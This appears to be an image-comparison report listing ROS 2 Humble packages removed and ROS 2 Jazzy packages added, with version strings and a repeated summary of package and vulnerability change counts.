➖	ros-humble-image-geometry	3.2.1-1jammy.20251108.185511
➖	ros-humble-image-tools	0.20.7-1jammy.20251120.092952
➖	ros-humble-image-transport	3.1.12-1jammy.20251120.132417
➖	ros-humble-interactive-markers	2.3.2-2jammy.20251120.103735
➖	ros-humble-intra-process-demo	0.20.7-1jammy.20251120.062957
➖	ros-humble-joy	3.3.0-1jammy.20251120.115745
➖	ros-humble-kdl-parser	2.6.4-1jammy.20251120.182428
➖	ros-humble-keyboard-handler	0.0.5-1jammy.20250719.010104
➖	ros-humble-laser-geometry	2.4.1-1jammy.20251120.091035
➖	ros-humble-launch	1.0.13-1jammy.20251108.134900
➖	ros-humble-launch-ros	0.19.13-1jammy.20251120.091405
➖	ros-humble-launch-testing	1.0.13-1jammy.20251108.142018
➖	ros-humble-launch-testing-ament-cmake	1.0.13-1jammy.20251108.142556
➖	ros-humble-launch-testing-ros	0.19.13-1jammy.20251120.092108
➖	ros-humble-launch-xml	1.0.13-1jammy.20251108.141327
➖	ros-humble-launch-yaml	1.0.13-1jammy.20251108.141218
➖	ros-humble-libcurl-vendor	3.1.3-1jammy.20250701.021753
➖	ros-humble-libmavconn	2.12.0-1jammy.20250915.054737
➖	ros-humble-libstatistics-collector	1.3.4-1jammy.20251108.191706
➖	ros-humble-libyaml-vendor	1.2.2-2jammy.20251108.145036
➖	ros-humble-lifecycle	0.20.7-1jammy.20251120.145939
➖	ros-humble-lifecycle-msgs	1.2.2-1jammy.20251108.153819
➖	ros-humble-logging-demo	0.20.7-1jammy.20251120.092939
➖	ros-humble-map-msgs	2.1.0-3jammy.20251108.171241
➖	ros-humble-mavlink	2025.9.9-1jammy.20250909.220931
➖	ros-humble-mavros	2.12.0-1jammy.20251120.200445
➖	ros-humble-mavros-extras	2.12.0-1jammy.20251120.212257
➖	ros-humble-mavros-msgs	2.12.0-1jammy.20251108.171449
➖	ros-humble-message-filters	4.3.11-1jammy.20251120.091653
➖	ros-humble-nav-msgs	4.9.0-1jammy.20251108.165249
➖	ros-humble-orocos-kdl-vendor	0.2.5-1jammy.20250719.005636

[JLP04]

Packages and Vulnerabilities (2992 package changes and 236 vulnerability changes)

• ➕ 855 packages added
• ➖ 681 packages removed
• ♾️ 1456 packages changed
• 134 packages unchanged

• ❗ 10 vulnerabilities added
• ✔️ 226 vulnerabilities removed

Changes for packages of type deb (2647 changes)

➖	ros-humble-osrf-pycommon	2.1.6-1jammy.20250701.031706
➖	ros-humble-pcl-conversions	2.4.5-2jammy.20251120.105220
➖	ros-humble-pcl-msgs	1.0.0-7jammy.20251108.171740
➖	ros-humble-pendulum-control	0.20.7-1jammy.20251120.125320
➖	ros-humble-pendulum-msgs	0.20.7-1jammy.20251119.172845
➖	ros-humble-pluginlib	5.1.2-1jammy.20251120.131335
➖	ros-humble-pybind11-vendor	2.4.2-1jammy.20250701.022820
➖	ros-humble-python-cmake-module	0.10.0-2jammy.20250719.010756
➖	ros-humble-python-orocos-kdl-vendor	0.2.5-1jammy.20250719.011342
➖	ros-humble-python-qt-binding	1.1.3-1jammy.20251008.191523
➖	ros-humble-qt-dotgraph	2.2.4-1jammy.20251008.192157
➖	ros-humble-qt-gui	2.2.4-1jammy.20251008.192214
➖	ros-humble-qt-gui-cpp	2.2.4-1jammy.20251120.145118
➖	ros-humble-qt-gui-py-common	2.2.4-1jammy.20251008.192220
➖	ros-humble-quality-of-service-demo-cpp	0.20.7-1jammy.20251120.092046
➖	ros-humble-quality-of-service-demo-py	0.20.7-1jammy.20251120.063133
➖	ros-humble-rcl	5.3.11-1jammy.20251108.185719
➖	ros-humble-rcl-action	5.3.11-1jammy.20251108.191815
➖	ros-humble-rcl-interfaces	1.2.2-1jammy.20251108.154432
➖	ros-humble-rcl-lifecycle	5.3.11-1jammy.20251108.191554
➖	ros-humble-rcl-logging-interface	2.3.1-1jammy.20251108.145609
➖	ros-humble-rcl-logging-spdlog	2.3.1-1jammy.20251108.150111
➖	ros-humble-rcl-yaml-param-parser	5.3.11-1jammy.20251108.150530
➖	ros-humble-rclcpp	16.0.16-1jammy.20251119.172833
➖	ros-humble-rclcpp-action	16.0.16-1jammy.20251120.063021
➖	ros-humble-rclcpp-components	16.0.16-1jammy.20251120.065752
➖	ros-humble-rclcpp-lifecycle	16.0.16-1jammy.20251120.070133
➖	ros-humble-rclpy	3.3.19-1jammy.20251119.173040
➖	ros-humble-rcpputils	2.4.6-1jammy.20251108.144314
➖	ros-humble-rcutils	5.1.7-1jammy.20251108.143133
➖	ros-humble-resource-retriever	3.1.3-1jammy.20250719.011251
➖	ros-humble-rmw	6.1.2-1jammy.20251108.145112
➖	ros-humble-rmw-dds-common	1.6.0-2jammy.20251108.155307
➖	ros-humble-rmw-fastrtps-cpp	6.2.9-1jammy.20251108.183325
➖	ros-humble-rmw-fastrtps-shared-cpp	6.2.9-1jammy.20251108.160246
➖	ros-humble-rmw-implementation	2.8.5-1jammy.20251108.185056
➖	ros-humble-rmw-implementation-cmake	6.1.2-1jammy.20250719.011039
➖	ros-humble-robot-state-publisher	3.0.3-2jammy.20251120.183533
➖	ros-humble-ros-base	0.10.0-1jammy.20251120.194945
➖	ros-humble-ros-core	0.10.0-1jammy.20251120.152247
➖	ros-humble-ros-environment	3.2.2-1jammy.20250701.043910
➖	ros-humble-ros-workspace	1.0.2-2jammy.20250701.005917
➖	ros-humble-ros2action	0.18.15-1jammy.20251120.093001
➖	ros-humble-ros2bag	0.15.15-1jammy.20251120.183934
➖	ros-humble-ros2cli	0.18.15-1jammy.20251120.082825
➖	ros-humble-ros2cli-common-extensions	0.1.1-4jammy.20251120.150946
➖	ros-humble-ros2component	0.18.15-1jammy.20251120.094757
➖	ros-humble-ros2doctor	0.18.15-1jammy.20251120.093007
➖	ros-humble-ros2interface	0.18.15-1jammy.20251120.093015
➖	ros-humble-ros2launch	0.19.13-1jammy.20251120.125651
➖	ros-humble-ros2lifecycle	0.18.15-1jammy.20251120.094106
➖	ros-humble-ros2multicast	0.18.15-1jammy.20251120.083451
➖	ros-humble-ros2node	0.18.15-1jammy.20251120.093009
➖	ros-humble-ros2param	0.18.15-1jammy.20251120.094129
➖	ros-humble-ros2pkg	0.18.15-1jammy.20251120.093005
➖	ros-humble-ros2run	0.18.15-1jammy.20251120.093559
➖	ros-humble-ros2service	0.18.15-1jammy.20251120.093239
➖	ros-humble-ros2topic	0.18.15-1jammy.20251120.093138
➖	ros-humble-rosbag2	0.15.15-1jammy.20251120.190140
➖	ros-humble-rosbag2-compression	0.15.15-1jammy.20251120.174924
➖	ros-humble-rosbag2-compression-zstd	0.15.15-1jammy.20251120.175819
➖	ros-humble-rosbag2-cpp	0.15.15-1jammy.20251120.172923
➖	ros-humble-rosbag2-interfaces	0.15.15-1jammy.20251108.155236
➖	ros-humble-rosbag2-py	0.15.15-1jammy.20251120.183010
➖	ros-humble-rosbag2-storage	0.15.15-1jammy.20251120.170853
➖	ros-humble-rosbag2-storage-default-plugins	0.15.15-1jammy.20251120.172133
➖	ros-humble-rosbag2-transport	0.15.15-1jammy.20251120.180516
➖	ros-humble-rosgraph-msgs	1.2.2-1jammy.20251108.155048
➖	ros-humble-rosidl-adapter	3.1.7-1jammy.20250719.011325
➖	ros-humble-rosidl-cli	3.1.7-1jammy.20250719.000059
➖	ros-humble-rosidl-cmake	3.1.7-1jammy.20250719.070621
➖	ros-humble-rosidl-default-generators	1.2.0-2jammy.20251108.152710
➖	ros-humble-rosidl-default-runtime	1.2.0-2jammy.20251108.152713
➖	ros-humble-rosidl-generator-c	3.1.7-1jammy.20251108.145657
➖	ros-humble-rosidl-generator-cpp	3.1.7-1jammy.20251108.150238
➖	ros-humble-rosidl-generator-py	0.14.6-1jammy.20251108.152038
➖	ros-humble-rosidl-parser	3.1.7-1jammy.20250719.060729
➖	ros-humble-rosidl-runtime-c	3.1.7-1jammy.20251108.144440
➖	ros-humble-rosidl-runtime-cpp	3.1.7-1jammy.20251108.145128
➖	ros-humble-rosidl-runtime-py	0.9.3-1jammy.20251108.184131
➖	ros-humble-rosidl-typesupport-c	2.0.2-1jammy.20251108.145713
➖	ros-humble-rosidl-typesupport-cpp	2.0.2-1jammy.20251108.150254
➖	ros-humble-rosidl-typesupport-fastrtps-c	2.2.3-1jammy.20251108.151511
➖	ros-humble-rosidl-typesupport-fastrtps-cpp	2.2.3-1jammy.20251108.150956
➖	ros-humble-rosidl-typesupport-interface	3.1.7-1jammy.20250719.011341
➖	ros-humble-rosidl-typesupport-introspection-c	3.1.7-1jammy.20251108.145228
➖	ros-humble-rosidl-typesupport-introspection-cpp	3.1.7-1jammy.20251108.145721
➖	ros-humble-rpyutils	0.2.2-1jammy.20250919.232447
➖	ros-humble-rqt-action	2.0.1-3jammy.20251120.154201
➖	ros-humble-rqt-bag	1.1.5-1jammy.20251120.184120
➖	ros-humble-rqt-bag-plugins	1.1.5-1jammy.20251120.190801
➖	ros-humble-rqt-common-plugins	1.2.0-1jammy.20251120.193729
➖	ros-humble-rqt-console	2.0.3-1jammy.20251120.153155
➖	ros-humble-rqt-graph	1.3.1-1jammy.20251120.154624
➖	ros-humble-rqt-gui	1.1.9-1jammy.20251120.094211
➖	ros-humble-rqt-gui-cpp	1.1.9-1jammy.20251120.150704
➖	ros-humble-rqt-gui-py	1.1.9-1jammy.20251120.152450
➖	ros-humble-rqt-image-view	1.2.0-2jammy.20251120.151440
➖	ros-humble-rqt-msg	1.2.0-1jammy.20251120.153714
➖	ros-humble-rqt-plot	1.1.5-1jammy.20251120.153523
➖	ros-humble-rqt-publisher	1.5.0-1jammy.20251120.154713
➖	ros-humble-rqt-py-common	1.1.9-1jammy.20251120.094200
➖	ros-humble-rqt-py-console	1.0.2-3jammy.20251120.153600
➖	ros-humble-rqt-reconfigure	1.1.2-1jammy.20251120.153736
➖	ros-humble-rqt-service-caller	1.0.5-3jammy.20251120.154928
➖	ros-humble-rqt-shell	1.0.2-3jammy.20251120.155124
➖	ros-humble-rqt-srv	1.0.3-3jammy.20251120.154216
➖	ros-humble-rqt-topic	1.5.0-1jammy.20251120.155147
➖	ros-humble-rttest	0.13.0-2jammy.20250719.011917
➖	ros-humble-rviz-assimp-vendor	11.2.23-1jammy.20251108.141254
➖	ros-humble-rviz-common	11.2.23-1jammy.20251120.145702
➖	ros-humble-rviz-default-plugins	11.2.23-1jammy.20251120.211143
➖	ros-humble-rviz-ogre-vendor	11.2.23-1jammy.20251108.141413
➖	ros-humble-rviz-rendering	11.2.23-1jammy.20251108.150656
➖	ros-humble-rviz2	11.2.23-1jammy.20251120.223401
➖	ros-humble-sdl2-vendor	3.3.0-1jammy.20250701.023507
➖	ros-humble-sensor-msgs	4.9.0-1jammy.20251108.165802
➖	ros-humble-sensor-msgs-py	4.9.0-1jammy.20251108.185524
➖	ros-humble-shape-msgs	4.9.0-1jammy.20251108.172856
➖	ros-humble-shared-queues-vendor	0.15.15-1jammy.20250716.201356
➖	ros-humble-spdlog-vendor	1.3.1-1jammy.20250719.011935
➖	ros-humble-sqlite3-vendor	0.15.15-1jammy.20250716.201402
➖	ros-humble-sros2	0.10.7-1jammy.20251120.150128
➖	ros-humble-sros2-cmake	0.10.7-1jammy.20251120.151745
➖	ros-humble-statistics-msgs	1.2.2-1jammy.20251108.155131
➖	ros-humble-std-msgs	4.9.0-1jammy.20251108.155128
➖	ros-humble-std-srvs	4.9.0-1jammy.20251108.155709
➖	ros-humble-stereo-msgs	4.9.0-1jammy.20251108.171929
➖	ros-humble-tango-icons-vendor	0.1.1-3jammy.20250719.011945
➖	ros-humble-teleop-twist-joy	2.4.8-1jammy.20251120.164443
➖	ros-humble-teleop-twist-keyboard	2.4.1-1jammy.20251120.094817
➖	ros-humble-tf2	0.25.17-1jammy.20251108.164230
➖	ros-humble-tf2-bullet	0.25.17-1jammy.20251120.153054
➖	ros-humble-tf2-eigen	0.25.17-1jammy.20251120.153108
➖	ros-humble-tf2-eigen-kdl	0.25.17-1jammy.20251108.185229
➖	ros-humble-tf2-geometry-msgs	0.25.17-1jammy.20251120.103045
➖	ros-humble-tf2-kdl	0.25.17-1jammy.20251120.103137
➖	ros-humble-tf2-msgs	0.25.17-1jammy.20251108.182254
➖	ros-humble-tf2-py	0.25.17-1jammy.20251120.094824
➖	ros-humble-tf2-ros	0.25.17-1jammy.20251120.100601
➖	ros-humble-tf2-ros-py	0.25.17-1jammy.20251120.095426
➖	ros-humble-tf2-sensor-msgs	0.25.17-1jammy.20251120.103431
➖	ros-humble-tf2-tools	0.25.17-1jammy.20251120.100214
➖	ros-humble-tinyxml-vendor	0.8.3-2jammy.20250701.024236
➖	ros-humble-tinyxml2-vendor	0.7.7-1jammy.20251120.082935
➖	ros-humble-tlsf	0.7.0-2jammy.20250719.012146
➖	ros-humble-tlsf-cpp	0.13.0-2jammy.20251120.124648
➖	ros-humble-topic-monitor	0.20.7-1jammy.20251120.092058
➖	ros-humble-tracetools	4.1.1-1jammy.20250719.005538
➖	ros-humble-trajectory-msgs	4.9.0-1jammy.20251108.173034
➖	ros-humble-turtlesim	1.4.3-1jammy.20251120.100651
➖	ros-humble-uncrustify-vendor	2.0.2-2jammy.20250701.024637
➖	ros-humble-unique-identifier-msgs	2.2.1-3jammy.20251108.155806
➖	ros-humble-urdf	2.6.1-1jammy.20251120.145129
➖	ros-humble-urdf-parser-plugin	2.6.1-1jammy.20250719.005630
➖	ros-humble-urdfdom	3.0.2-2jammy.20250719.014522
➖	ros-humble-urdfdom-headers	1.0.6-2jammy.20250701.051346
➖	ros-humble-visualization-msgs	4.9.0-1jammy.20251108.172125
➖	ros-humble-yaml-cpp-vendor	8.0.2-1jammy.20250701.025036
➖	ros-humble-zstd-vendor	0.15.15-1jammy.20250716.201418
➕	ros-jazzy-action-msgs		2.0.3-1noble.20260124.024102
➕	ros-jazzy-action-tutorials-cpp		0.33.9-1noble.20260124.175743
➕	ros-jazzy-action-tutorials-interfaces		0.33.9-1noble.20260124.071007
➕	ros-jazzy-action-tutorials-py		0.33.9-1noble.20260124.160909
➕	ros-jazzy-actionlib-msgs		5.3.6-1noble.20260124.104636
➕	ros-jazzy-ament-cmake		2.5.5-1noble.20260121.203206
➕	ros-jazzy-ament-cmake-auto		2.5.5-1noble.20260121.204900
➕	ros-jazzy-ament-cmake-copyright		0.17.4-1noble.20260121.202700
➕	ros-jazzy-ament-cmake-core		2.5.5-1noble.20260121.175713
➕	ros-jazzy-ament-cmake-cppcheck		0.17.4-1noble.20260121.190223
➕	ros-jazzy-ament-cmake-cpplint		0.17.4-1noble.20260121.190148
➕	ros-jazzy-ament-cmake-export-definitions		2.5.5-1noble.20260121.182616
➕	ros-jazzy-ament-cmake-export-dependencies		2.5.5-1noble.20260121.183831
➕	ros-jazzy-ament-cmake-export-include-directories		2.5.5-1noble.20260121.183009
➕	ros-jazzy-ament-cmake-export-interfaces		2.5.5-1noble.20260121.202634
➕	ros-jazzy-ament-cmake-export-libraries		2.5.5-1noble.20260121.202106
➕	ros-jazzy-ament-cmake-export-link-flags		2.5.5-1noble.20260121.201609
➕	ros-jazzy-ament-cmake-export-targets		2.5.5-1noble.20260121.202652
➕	ros-jazzy-ament-cmake-flake8		0.17.4-1noble.20260121.185729
➕	ros-jazzy-ament-cmake-gen-version-h		2.5.5-1noble.20260121.202125
➕	ros-jazzy-ament-cmake-gmock		2.5.5-1noble.20260121.193618
➕	ros-jazzy-ament-cmake-gtest		2.5.5-1noble.20260121.193120
➕	ros-jazzy-ament-cmake-include-directories		2.5.5-1noble.20260121.183017
➕	ros-jazzy-ament-cmake-libraries		2.5.5-1noble.20260121.183018
➕	ros-jazzy-ament-cmake-lint-cmake		0.17.4-1noble.20260121.184544
➕	ros-jazzy-ament-cmake-pep257		0.17.4-1noble.20260121.185732
➕	ros-jazzy-ament-cmake-pytest		2.5.5-1noble.20260121.185029
➕	ros-jazzy-ament-cmake-python		2.5.5-1noble.20260121.183030
➕	ros-jazzy-ament-cmake-ros		0.12.0-3noble.20260121.205129
➕	ros-jazzy-ament-cmake-target-dependencies		2.5.5-1noble.20260121.183843
➕	ros-jazzy-ament-cmake-test		2.5.5-1noble.20260121.183839
➕	ros-jazzy-ament-cmake-uncrustify		0.17.4-1noble.20260122.154053
➕	ros-jazzy-ament-cmake-version		2.5.5-1noble.20260121.183037
➕	ros-jazzy-ament-cmake-xmllint		0.17.4-1noble.20260121.190148
➕	ros-jazzy-ament-copyright		0.17.4-1noble.20260121.202154
➕	ros-jazzy-ament-cppcheck		0.17.4-1noble.20260121.185719
➕	ros-jazzy-ament-cpplint		0.17.4-1noble.20260121.185310
➕	ros-jazzy-ament-flake8		0.17.4-1noble.20260121.185052
➕	ros-jazzy-ament-index-cpp		1.8.2-1noble.20260121.205420
➕	ros-jazzy-ament-index-python		1.8.2-1noble.20260121.183835
➕	ros-jazzy-ament-lint		0.17.4-1noble.20260121.184509
➕	ros-jazzy-ament-lint-auto		0.17.4-1noble.20260121.185027
➕	ros-jazzy-ament-lint-cmake		0.17.4-1noble.20260121.183850
➕	ros-jazzy-ament-lint-common		0.17.4-1noble.20260122.154554
➕	ros-jazzy-ament-package		0.16.5-1noble.20260121.175232
➕	ros-jazzy-ament-pep257		0.17.4-1noble.20260121.185108
➕	ros-jazzy-ament-uncrustify		0.17.4-1noble.20260122.153606
➕	ros-jazzy-ament-xmllint		0.17.4-1noble.20260121.185306
➕	ros-jazzy-angles		1.16.1-1noble.20260121.215417
➕	ros-jazzy-builtin-interfaces		2.0.3-1noble.20260123.070015
➕	ros-jazzy-class-loader		2.7.0-3noble.20260121.220654
➕	ros-jazzy-common-interfaces		5.3.6-1noble.20260124.152005
➕	ros-jazzy-composition		0.33.9-1noble.20260124.174355
➕	ros-jazzy-composition-interfaces		2.0.3-1noble.20260124.091107
➕	ros-jazzy-console-bridge-vendor		1.7.1-3noble.20260121.220053
➕	ros-jazzy-cv-bridge		4.1.0-1noble.20260124.163629
➕	ros-jazzy-demo-nodes-cpp		0.33.9-1noble.20260124.174355
➕	ros-jazzy-demo-nodes-cpp-native		0.33.9-1noble.20260124.180806
➕	ros-jazzy-demo-nodes-py		0.33.9-1noble.20260124.095301
➕	ros-jazzy-depthimage-to-laserscan		2.5.1-3noble.20260124.180911
➕	ros-jazzy-desktop		0.11.0-1noble.20260125.211358
➕	ros-jazzy-diagnostic-msgs		5.3.6-1noble.20260124.122153
➕	ros-jazzy-diagnostic-updater		4.2.6-1noble.20260124.164052
➕	ros-jazzy-domain-coordinator		0.12.0-3noble.20260121.183820
➕	ros-jazzy-dummy-map-server		0.33.9-1noble.20260124.164600
➕	ros-jazzy-dummy-robot-bringup		0.33.9-1noble.20260124.194256
➕	ros-jazzy-dummy-sensors		0.33.9-1noble.20260124.170133
➕	ros-jazzy-eigen-stl-containers		1.1.0-1noble.20260121.220643
➕	ros-jazzy-eigen3-cmake-module		0.3.0-3noble.20260121.220633
➕	ros-jazzy-example-interfaces		0.12.0-3noble.20260124.085149
➕	ros-jazzy-examples-rclcpp-minimal-action-client		0.19.7-1noble.20260124.173841
➕	ros-jazzy-examples-rclcpp-minimal-action-server		0.19.7-1noble.20260124.182229
➕	ros-jazzy-examples-rclcpp-minimal-client		0.19.7-1noble.20260124.170848
➕	ros-jazzy-examples-rclcpp-minimal-composition		0.19.7-1noble.20260124.182237
➕	ros-jazzy-examples-rclcpp-minimal-publisher		0.19.7-1noble.20260124.170739
➕	ros-jazzy-examples-rclcpp-minimal-service		0.19.7-1noble.20260124.170814
➕	ros-jazzy-examples-rclcpp-minimal-subscriber		0.19.7-1noble.20260124.182245
➕	ros-jazzy-examples-rclcpp-minimal-timer		0.19.7-1noble.20260124.170753
➕	ros-jazzy-examples-rclcpp-multithreaded-executor		0.19.7-1noble.20260124.170807
➕	ros-jazzy-examples-rclpy-executors		0.19.7-1noble.20260124.095301
➕	ros-jazzy-examples-rclpy-minimal-action-client		0.19.7-1noble.20260124.095759
➕	ros-jazzy-examples-rclpy-minimal-action-server		0.19.7-1noble.20260124.095806
➕	ros-jazzy-examples-rclpy-minimal-client		0.19.7-1noble.20260124.095804
➕	ros-jazzy-examples-rclpy-minimal-publisher		0.19.7-1noble.20260124.095808
➕	ros-jazzy-examples-rclpy-minimal-service		0.19.7-1noble.20260124.100233
➕	ros-jazzy-examples-rclpy-minimal-subscriber		0.19.7-1noble.20260124.100251
➕	ros-jazzy-fastcdr		2.2.5-1noble.20260121.192454
➕	ros-jazzy-fastrtps		2.14.5-2noble.20260121.193044
➕	ros-jazzy-fastrtps-cmake-module		3.6.3-1noble.20260121.222257
➕	ros-jazzy-foonathan-memory-vendor		1.3.1-3noble.20260121.190640
➕	ros-jazzy-geographic-msgs		1.0.6-2noble.20260124.123557
➕	ros-jazzy-geometry-msgs		5.3.6-1noble.20260124.114227
➕	ros-jazzy-geometry2		0.36.19-1noble.20260124.204422
➕	ros-jazzy-gmock-vendor		1.14.9000-2noble.20260121.193113
➕	ros-jazzy-gtest-vendor		1.14.9000-2noble.20260121.192609
➕	ros-jazzy-gz-cmake-vendor		0.0.10-1noble.20260121.185101
➕	ros-jazzy-gz-math-vendor		0.0.8-1noble.20260121.190500
➕	ros-jazzy-gz-utils-vendor		0.0.5-1noble.20260121.185926
➕	ros-jazzy-image-geometry		4.1.0-1noble.20260124.145400
➕	ros-jazzy-image-tools		0.33.9-1noble.20260124.182940
➕	ros-jazzy-image-transport		5.1.7-1noble.20260124.183634
➕	ros-jazzy-interactive-markers		2.5.5-1noble.20260124.202838
➕	ros-jazzy-intra-process-demo		0.33.9-1noble.20260124.171537
➕	ros-jazzy-joy		3.3.0-3noble.20260124.183622
➕	ros-jazzy-kdl-parser		2.11.0-3noble.20260122.152550
➕	ros-jazzy-keyboard-handler		0.3.2-1noble.20260121.223917
➕	ros-jazzy-laser-geometry		2.7.2-1noble.20260124.171533
➕	ros-jazzy-launch		3.4.10-1noble.20260121.184520
➕	ros-jazzy-launch-ros		0.26.11-1noble.20260124.094216
➕	ros-jazzy-launch-testing		3.4.10-1noble.20260121.203223
➕	ros-jazzy-launch-testing-ament-cmake		3.4.10-1noble.20260123.034135
➕	ros-jazzy-launch-testing-ros		0.26.11-1noble.20260124.095007
➕	ros-jazzy-launch-xml		3.4.10-1noble.20260121.202157
➕	ros-jazzy-launch-yaml		3.4.10-1noble.20260121.202732
➕	ros-jazzy-libcurl-vendor		3.4.4-1noble.20260121.224417
➕	ros-jazzy-liblz4-vendor		0.26.9-1noble.20260125.195242
➕	ros-jazzy-libmavconn		2.14.0-1noble.20260121.225904
➕	ros-jazzy-libstatistics-collector		1.7.4-1noble.20260124.093902
➕	ros-jazzy-libyaml-vendor		1.6.3-2noble.20260121.224843
➕	ros-jazzy-lifecycle		0.33.9-1noble.20260125.001420
➕	ros-jazzy-lifecycle-msgs		2.0.3-1noble.20260124.085400
➕	ros-jazzy-logging-demo		0.33.9-1noble.20260125.001414
➕	ros-jazzy-map-msgs		2.4.1-2noble.20260124.145254
➕	ros-jazzy-mavlink		2025.12.12-1noble.20260121.225320
➕	ros-jazzy-mavros		2.14.0-1noble.20260125.001824
➕	ros-jazzy-mavros-extras		2.14.0-1noble.20260125.005827
➕	ros-jazzy-mavros-msgs		2.14.0-1noble.20260124.235418
➕	ros-jazzy-mcap-vendor		0.26.9-1noble.20260125.200454
➕	ros-jazzy-message-filters		4.11.9-1noble.20260124.172124
➕	ros-jazzy-nav-msgs		5.3.6-1noble.20260124.130317
➕	ros-jazzy-orocos-kdl-vendor		0.5.1-2noble.20260121.221252
➕	ros-jazzy-osrf-pycommon		2.1.7-1noble.20260121.183823
➕	ros-jazzy-pcl-conversions		2.6.2-1noble.20260124.173016
➕	ros-jazzy-pcl-msgs		1.0.0-9noble.20260124.150131
➕	ros-jazzy-pendulum-control		0.33.9-1noble.20260124.225341
➕	ros-jazzy-pendulum-msgs		0.33.9-1noble.20260124.085920
➕	ros-jazzy-pluginlib		5.4.4-1noble.20260122.100109
➕	ros-jazzy-point-cloud-transport		4.0.6-1noble.20260125.001441
➕	ros-jazzy-pybind11-vendor		3.1.3-1noble.20260121.234330
➕	ros-jazzy-python-cmake-module		0.11.1-2noble.20260123.031946
➕	ros-jazzy-python-orocos-kdl-vendor		0.5.1-2noble.20260123.041525
➕	ros-jazzy-python-qt-binding		2.2.2-1noble.20260121.234552
➕	ros-jazzy-qt-dotgraph		2.7.5-1noble.20260122.000255
➕	ros-jazzy-qt-gui		2.7.5-1noble.20260123.063638
➕	ros-jazzy-qt-gui-cpp		2.7.5-1noble.20260123.070614
➕	ros-jazzy-qt-gui-py-common		2.7.5-1noble.20260122.000242

[JLP04]

Packages and Vulnerabilities (2992 package changes and 236 vulnerability changes)

• ➕ 855 packages added
• ➖ 681 packages removed
• ♾️ 1456 packages changed
• 134 packages unchanged

• ❗ 10 vulnerabilities added
• ✔️ 226 vulnerabilities removed

Changes for packages of type deb (2647 changes)

➕	ros-jazzy-quality-of-service-demo-cpp		0.33.9-1noble.20260124.174536
➕	ros-jazzy-quality-of-service-demo-py		0.33.9-1noble.20260124.144452
➕	ros-jazzy-rcl		9.2.8-1noble.20260124.091030
➕	ros-jazzy-rcl-action		9.2.8-1noble.20260124.092116
➕	ros-jazzy-rcl-interfaces		2.0.3-1noble.20260124.090056
➕	ros-jazzy-rcl-lifecycle		9.2.8-1noble.20260124.092104
➕	ros-jazzy-rcl-logging-interface		3.1.1-1noble.20260121.215517
➕	ros-jazzy-rcl-logging-spdlog		3.1.1-1noble.20260122.004204
➕	ros-jazzy-rcl-yaml-param-parser		9.2.8-1noble.20260122.070241
➕	ros-jazzy-rclcpp		28.1.16-1noble.20260124.161126
➕	ros-jazzy-rclcpp-action		28.1.16-1noble.20260124.173148
➕	ros-jazzy-rclcpp-components		28.1.16-1noble.20260124.173228
➕	ros-jazzy-rclcpp-lifecycle		28.1.16-1noble.20260124.173652
➕	ros-jazzy-rclpy		7.1.9-1noble.20260124.093049
➕	ros-jazzy-rcpputils		2.11.2-1noble.20260121.215516
➕	ros-jazzy-rcutils		6.7.5-1noble.20260121.212235
➕	ros-jazzy-resource-retriever		3.4.4-1noble.20260121.224912
➕	ros-jazzy-rmw		7.3.3-1noble.20260122.065647
➕	ros-jazzy-rmw-dds-common		3.1.1-1noble.20260124.032150
➕	ros-jazzy-rmw-fastrtps-cpp		8.4.3-1noble.20260124.065847
➕	ros-jazzy-rmw-fastrtps-shared-cpp		8.4.3-1noble.20260124.062814
➕	ros-jazzy-rmw-implementation		2.15.6-1noble.20260124.071319
➕	ros-jazzy-rmw-implementation-cmake		7.3.3-1noble.20260121.235723
➕	ros-jazzy-robot-state-publisher		3.3.3-3noble.20260124.193510
➕	ros-jazzy-ros-base		0.11.0-1noble.20260125.205608
➕	ros-jazzy-ros-core		0.11.0-1noble.20260124.221633
➕	ros-jazzy-ros-environment		4.2.1-1noble.20260121.202102
➕	ros-jazzy-ros-workspace		1.0.3-7noble.20260121.181844
➕	ros-jazzy-ros2action		0.32.8-1noble.20260124.102944
➕	ros-jazzy-ros2bag		0.26.9-1noble.20260125.204124
➕	ros-jazzy-ros2cli		0.32.8-1noble.20260124.102319
➕	ros-jazzy-ros2cli-common-extensions		0.3.1-1noble.20260124.221010
➕	ros-jazzy-ros2component		0.32.8-1noble.20260124.220330
➕	ros-jazzy-ros2doctor		0.32.8-1noble.20260124.102949
➕	ros-jazzy-ros2interface		0.32.8-1noble.20260124.103617
➕	ros-jazzy-ros2launch		0.26.11-1noble.20260124.103622
➕	ros-jazzy-ros2lifecycle		0.32.8-1noble.20260124.105320
➕	ros-jazzy-ros2multicast		0.32.8-1noble.20260124.103617
➕	ros-jazzy-ros2node		0.32.8-1noble.20260124.103613
➕	ros-jazzy-ros2param		0.32.8-1noble.20260124.105330
➕	ros-jazzy-ros2pkg		0.32.8-1noble.20260124.102939
➕	ros-jazzy-ros2plugin		5.4.4-1noble.20260124.103623
➕	ros-jazzy-ros2run		0.32.8-1noble.20260124.103615
➕	ros-jazzy-ros2service		0.32.8-1noble.20260124.104627
➕	ros-jazzy-ros2topic		0.32.8-1noble.20260124.103616
➕	ros-jazzy-rosbag2		0.26.9-1noble.20260125.204627
➕	ros-jazzy-rosbag2-compression		0.26.9-1noble.20260125.201533
➕	ros-jazzy-rosbag2-compression-zstd		0.26.9-1noble.20260125.202154
➕	ros-jazzy-rosbag2-cpp		0.26.9-1noble.20260125.200834
➕	ros-jazzy-rosbag2-interfaces		0.26.9-1noble.20260125.195342
➕	ros-jazzy-rosbag2-py		0.26.9-1noble.20260125.203235
➕	ros-jazzy-rosbag2-storage		0.26.9-1noble.20260125.195625
➕	ros-jazzy-rosbag2-storage-default-plugins		0.26.9-1noble.20260125.202803
➕	ros-jazzy-rosbag2-storage-mcap		0.26.9-1noble.20260125.200928
➕	ros-jazzy-rosbag2-storage-sqlite3		0.26.9-1noble.20260125.200819
➕	ros-jazzy-rosbag2-transport		0.26.9-1noble.20260125.202305
➕	ros-jazzy-rosgraph-msgs		2.0.3-1noble.20260124.092120
➕	ros-jazzy-rosidl-adapter		4.6.7-1noble.20260121.203713
➕	ros-jazzy-rosidl-cli		4.6.7-1noble.20260121.184146
➕	ros-jazzy-rosidl-cmake		4.6.7-1noble.20260122.001613
➕	ros-jazzy-rosidl-core-generators		0.2.0-3noble.20260123.041338
➕	ros-jazzy-rosidl-core-runtime		0.2.0-3noble.20260123.062647
➕	ros-jazzy-rosidl-default-generators		1.6.0-3noble.20260124.030004
➕	ros-jazzy-rosidl-default-runtime		1.6.0-3noble.20260124.025359
➕	ros-jazzy-rosidl-dynamic-typesupport		0.1.2-3noble.20260122.003915
➕	ros-jazzy-rosidl-dynamic-typesupport-fastrtps		0.1.0-3noble.20260122.065659
